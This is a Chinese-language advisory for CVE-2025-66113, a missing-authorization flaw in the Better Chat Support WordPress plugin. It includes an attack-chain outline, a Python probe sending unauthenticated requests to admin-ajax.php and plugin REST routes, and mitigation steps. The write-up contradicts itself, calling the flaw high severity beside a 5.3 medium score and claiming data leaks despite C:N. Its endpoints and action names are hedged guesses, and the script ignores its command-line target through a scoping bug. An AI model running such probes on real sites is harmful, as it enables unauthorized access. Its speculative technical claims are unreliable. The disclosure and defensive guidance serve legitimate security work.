CVE-2025-66113 WordPress Better Chat Support 访问控制缺陷漏洞

漏洞信息

漏洞编号

CVE-2025-66113

漏洞类型

缺失授权访问控制

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ThemeAtelier Better Chat Support for Messenger (WordPress插件)

漏洞概述

CVE-2025-66113是WordPress插件Better Chat Support中存在的一个高危访问控制漏洞。该插件是一款用于在WordPress网站集成Facebook Messenger聊天功能的工具，由ThemeAtelier开发。漏洞类型为Missing Authorization（缺失授权），允许未认证的攻击者利用插件中错误配置的访问控制安全级别，执行本应需要授权才能访问的功能。

该漏洞的CVSS评分为5.3，属于中等严重程度。攻击向量为网络攻击（AV:N），无需特殊权限（PR:N）且不需要用户交互（UI:N）。虽然对机密性（C:N）和完整性（I:L）的影响较低，但由于访问控制机制缺失，攻击者可以绕过认证直接访问敏感功能或数据。

此漏洞影响Better Chat Support for Messenger插件从任意版本到1.2.18的所有版本。攻击者可以通过构造特定的HTTP请求，无需任何认证凭据即可访问管理功能或用户数据。这可能导致聊天记录泄露、未授权配置修改或进一步的攻击利用。该漏洞由Patchstack安全团队发现并报告（[email protected]），披露日期为2025年11月21日。建议使用该插件的网站管理员立即更新到最新修复版本或采取临时缓解措施。

技术细节

该漏洞的根本原因在于Better Chat Support插件的访问控制机制实现不当。插件的某些敏感功能端点（如AJAX处理函数或REST API路由）缺少适当的权限检查（capability checks或nonce验证），导致任何匿名用户都可以直接访问这些功能。

具体来说，插件可能存在以下问题：

1. **缺失权限检查**：插件的admin-ajax.php端点或REST API路由没有调用current_user_can()或is_user_logged_in()等权限验证函数。

2. **Nonce验证缺失**：关键操作没有实现CSRF token验证，攻击者可以构造恶意请求。

3. **数据暴露**：聊天记录、用户信息或配置数据可能通过未授权接口被直接访问。

4. **配置修改**：攻击者可能能够修改插件设置，影响网站功能或安全。

利用此漏洞的攻击者可以发送如下构造的HTTP请求：
- POST /wp-admin/admin-ajax.php（带特定action参数）
- GET/POST /wp-json/better-chat-support/v1/*（REST API端点）

由于无需认证，攻击者可以直接从互联网发起攻击。成功利用后可能导致数据泄露、会话劫持或进一步的攻击链。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网站使用的WordPress CMS，并检测Better Chat Support插件的安装状态和版本信息

STEP 2

2. 端点识别

通过扫描识别插件的敏感端点，包括admin-ajax.php处理函数、REST API路由或直接访问插件文件

STEP 3

3. 未授权访问

由于插件缺少权限检查，攻击者可以直接发送HTTP请求访问敏感功能，无需任何认证凭据或会话cookie

STEP 4

4. 数据窃取或操作

利用缺失的访问控制，攻击者可以获取聊天记录、用户信息或修改插件配置

STEP 5

5. 权限提升或进一步攻击

窃取的数据可用于社会工程攻击、账户接管或其他进一步的安全威胁

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-66113 PoC - Better Chat Support Broken Access Control
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys

TARGET_URL = "https://vulnerable-site.com"  # Replace with target URL

def check_vulnerability():
    """Check if the target is vulnerable to CVE-2025-66113"""
    
    print(f"[*] Testing {TARGET_URL} for CVE-2025-66113")
    print("[*] Vulnerability: Missing Authorization in Better Chat Support\n")
    
    # Test 1: Check if admin-ajax.php endpoint is accessible without auth
    endpoints = [
        "/wp-admin/admin-ajax.php",
        "/wp-json/better-chat-support/v1/settings",
        "/wp-json/better-chat-support/v1/chats",
    ]
    
    vulnerable = False
    
    for endpoint in endpoints:
        url = TARGET_URL + endpoint
        
        # Test with action parameter (common for AJAX endpoints)
        if "admin-ajax.php" in endpoint:
            params = {"action": "better_chat_get_settings"}
            try:
                response = requests.get(url, params=params, timeout=10)
                if response.status_code == 200:
                    print(f"[+] Endpoint {endpoint} is accessible without authentication")
                    print(f"[+] Response preview: {response.text[:200]}...")
                    vulnerable = True
            except requests.RequestException as e:
                print(f"[-] Error accessing {endpoint}: {e}")
        
        # Test REST API endpoints
        else:
            try:
                response = requests.get(url, timeout=10)
                if response.status_code in [200, 400, 403]:
                    # Any response other than 401/404 might indicate the endpoint exists
                    print(f"[+] REST endpoint {endpoint} returned status {response.status_code}")
                    if response.status_code == 200:
                        print(f"[+] Response preview: {response.text[:200]}...")
                        vulnerable = True
            except requests.RequestException as e:
                print(f"[-] Error accessing {endpoint}: {e}")
    
    if vulnerable:
        print("\n[!] Target appears to be VULNERABLE to CVE-2025-66113")
        print("[!] Recommendation: Update Better Chat Support plugin to version > 1.2.18")
    else:
        print("\n[*] Target does not appear to be vulnerable or plugin not detected")
    
    return vulnerable

def main():
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    
    check_vulnerability()

if __name__ == "__main__":
    main()

影响范围

Better Chat Support for Messenger <= 1.2.18

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时缓解措施：1) 禁用或删除Better Chat Support插件；2) 使用Web应用防火墙（WAF）规则阻止对插件端点的未授权访问；3) 限制wp-admin目录访问，仅允许管理员IP访问；4) 监控access.log日志，关注异常的admin-ajax.php或REST API请求模式；5) 实施基于HTTP请求特征的临时阻断规则。